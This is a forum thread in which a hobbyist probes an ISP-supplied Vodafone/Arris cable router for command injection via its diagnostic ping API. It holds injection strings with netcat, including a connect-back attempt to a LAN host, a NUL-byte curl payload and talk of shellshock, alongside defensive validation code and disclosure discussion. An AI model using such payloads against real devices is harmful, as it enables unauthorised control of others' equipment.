(success) Command injection possible!

My ISP sent over a new DOCSIS/Router box.
Of course the software on this new device piqued my interest.

They call it “Vodafone Docsis 3.1”, of course it’s some ODM device they rebranded. It’s running firmware version “01.02.068.10.EURO.SIP”.
Edit: I’m fairly certain the device is called Arris VodafoneStation TG344DE. The Intel SoC is called Puma.

I can tell the firmware is still very much in flux by the amount of changes in the Web UI (new features etc.) after the upgrade.

It has this neat about page, and before the automatic & mandatory update it even contained a list of all software versions, and on what CPU they are installed. (It actually runs 2 separate Linux instances; one for the modem, one for the router.) The updated about page removed the CPU info, and only shows certain packages with versions.

As usual, I tried the most basic command injection I could find. It has a diagnostics ping/traceroute web interface. Logically, I sent a request using my browser, recorded it using the developer tools, and looked at the data sent. It’s JSON, so it’s easy to modify. The HTTP requests seem to not have any “rolling number” that would make sending out-of-order requests harder.

When I sent an address field like “8.8.8.8; nc -lp 1234; #” to test if the address field is properly escaped, I got back a message like this:

{"Data":{"Target":"parameter value failed validation. matching \/^[A-Za-z0-9:.\\-\\\/]+$\/ against 8.8.8.8; nc -lp 1234; #"}}

Isn’t that interesting? We get the regex we try to exploit for free!
I’m not a regex expert, but it looks to me like it allows the characters “A-Z”, “a-z”, “0-9”, “:”, “\”, “/”.

So, my question is: Can anybody craft an address field that passes these checks, but allows “command injection” of some sort?

I’m fairly certain that they use Bash 3.2.48. If they use the busybox ash, it’s from busybox version 1.22.1 or 1.22.

(After the upgrade, busybox shows up twice in the list; my guess is that this is because there are 2 busybox installations for the 2 Linux systems in that router. They removed the info about what version ran on what CPU after a firmware upgrade.)

Also, the version of bash seems to be vulnerable to some exploits, but that requires access to an environment variable. Any ideas?

Other, unrelated bits: I’m fairly certain that this device uses an Intel x86-based processor internally for some of its tasks; Intel is mentioned several times in version strings. It even has acpid and powertop installed, and uses systemd for init. The web interface uses PHP Version: 5.4.14. (The older versions seemed to use an even older PHP 3.)


hmm, the regex seems pretty safe against command injection.

you got that right. “.” and “-” are also allowed.
however, no spaces, so passing further arguments is limited.

have you tried messing with \0 and \n?


I have now played around a little more. I do get some interesting behavior when passing \0 in the address field:

curl 'http://192.168.0.1/php/ajaxSet_status_diagnostic_utility_data.php?_n=82017' \
(...)
--data-binary '{"Type":"PingStart","Data":{"Status":"Requested","Target":"8.8.8.8\0","PingNum":"3","PingInterval":"300","PingSize":"64","PingType":1}}'

I get SUCCESS returned (same as a valid request), and no error regarding invalid characters. In fact, including \0 in the address field seems to always return SUCCESS.

I’ve tried things like "Target":"$(/bin/busybox nc 192.168.0.90 1234)\0", but no luck, it seems like such a value won’t reach the shell?

My guess now is that if any shelling out is done, it’s most likely using the busybox ash. The version of bash that ships with the device is vulnerable to shellshock, so if we can guess where the device shells out to bash, and we can set any environment variable somehow, we might be able to use that.

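The regex quoted in the router’s error message, the “\n” and “\0” probes suggested above, and the hardened form of the check, as an added example written for this thread (not code from the device or from any poster). It reproduces the anchored `^...$` match in Python, whose `$` behaves like PCRE’s in matching before a trailing newline; the JSON-decode function encodes my own hypothesis for the SUCCESS-on-“\0” behaviour (a strict decoder rejects “\0” as an escape), which the thread does not confirm.

```python
import json
import re

# Pattern exactly as the router's error message printed it.
ROUTER_PATTERN = r"^[A-Za-z0-9:.\-\/]+$"


def router_validate(target: str) -> bool:
    """The check as quoted: anchored with ^ and $, no fullmatch.
    Both PCRE and Python let '$' match just before a final newline."""
    return re.search(ROUTER_PATTERN, target) is not None


def strict_validate(target: str) -> bool:
    """Hardened check: the whole string must match, so a trailing
    newline or any NUL byte is rejected rather than tolerated."""
    return re.fullmatch(r"[A-Za-z0-9:.\-/]+", target) is not None


def decode_target(raw_body: bytes):
    """Return Data.Target from a request body, or None when the JSON
    does not decode. Hypothesis (mine): a backend that treats a failed
    decode as an empty request would answer SUCCESS without pinging."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError:
        return None
    return body.get("Data", {}).get("Target")


def build_ping_argv(target: str, count: int = 3) -> list:
    """Defensive way to run the diagnostic: validate, refuse values that
    would be parsed as ping options ('-' is allowed by the class), and
    hand the target to the binary as a single argv element, never via
    a shell string."""
    if not strict_validate(target):
        raise ValueError("target failed validation")
    if target.startswith("-"):
        raise ValueError("target looks like an option")
    return ["ping", "-c", str(count), target]


# Constructed sample bodies, mirroring the curl payload quoted above.
VALID_BODY = b'{"Type":"PingStart","Data":{"Target":"8.8.8.8"}}'
NUL_ESCAPE_BODY = b'{"Type":"PingStart","Data":{"Target":"8.8.8.8\\0"}}'
```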

I have managed to get my hands on a firmware image, and was able to extract the root squashfs. Let’s hope some digging in the actual source can help. I really want shell access to these devices. In particular, I’ve heard rumors about the tracking they do, so I want to find out for myself (and maybe remove it?). But also just because it’s fun!


Finally got something!

Without going into detail, a completely unescaped user-input value lands in the arguments passed to a shell function.

(Might provide more details later if I’m sure I won’t get into trouble for it!)

BTW, the CPU self-identifies as:

model name : Intel(R) Atom(TM) CPU CE2752  @ 2.00GHz

So, in total it took me less than a day to find a security vulnerability in a system I had never seen before. Cool.


nice!

you are not obliged to, but you should report the vulnerability xP
a quick search showed that Vodafone has a disclosure process:

https://www.vodafone.com/report-a-vulnerability
https://hackerone.com/vodafone

if you decide to share details, i am looking forward to a writeup ^^


I’m not sure about what I read, but it seems nice.

@m1ckey I already had that site open, and I’m currently working on a detailed writeup.
@anon85095355 The tl;dr: ISP sent over a new device. I attempted to find a vulnerability in it. Success in less than a day of 0wning (pardon the pun) the device.


Impressive!

Do you work in infosec? Sysadmin?

Sounds like typical Vodafone to me.


No, I’m doing this as a hobby. Who knows, maybe in the future?


I’d say go for it, you good man.

@max1220 Hi, I’m looking into the same router. I’ve been looking at a firmware dump for days now and I’m lost; are you willing to give me a pointer? :)
Thank you.

I think I realized what the bug was, correct me if I’m wrong, but it’s the wifi country code setting logic. The bug is fixed on the later firmware versions; Vodafone pushed a new firmware version 01.02.068.11.EURO.SIP on the same day you discovered the bug, so I guess they fixed it the same day.


I can’t (yet) tell you much about the bug, other than that it seems unrelated to what you’ve found.

Unfortunately the first thing I tried and described here didn’t work, the issue that I later did find is somewhat unrelated.

I’ve been in contact with Vodafone about this issue, and I’ve tested again today on version 01.02.068.11.EURO.SIP and it’s still there (sorry, no hints).

I’ll post a detailed explanation when this issue is resolved and I get permission to post about it.


Oh, then there is still hope :) I’ll keep staring at the code :D Can you at least confirm that it’s command injection? Not some sort of code injection (buffer overflow etc.)?

No hints, but I can confirm staring at the code works.


Couldn’t figure it out. Maybe something is different between .SIP and .PC20 firmware. I’ll wait till Vodafone gets around to fixing it and until you can release a write-up. I bought a spare tg3442de on eBay so I’ll have one with the old firmware even when Vodafone fixes it.

Not sure if this helps, sorry for the necro, but I’ve found a document explaining the versioning scheme they use; maybe this can help someone:

The .SIP and .PC20 are just the telephony signaling types. I didn’t find an EU SIP firmware either, but most relevant code seems to be included in all firmwares.

Unrelated: I’ll definitely still write a post/blog thing about this when this issue is resolved.
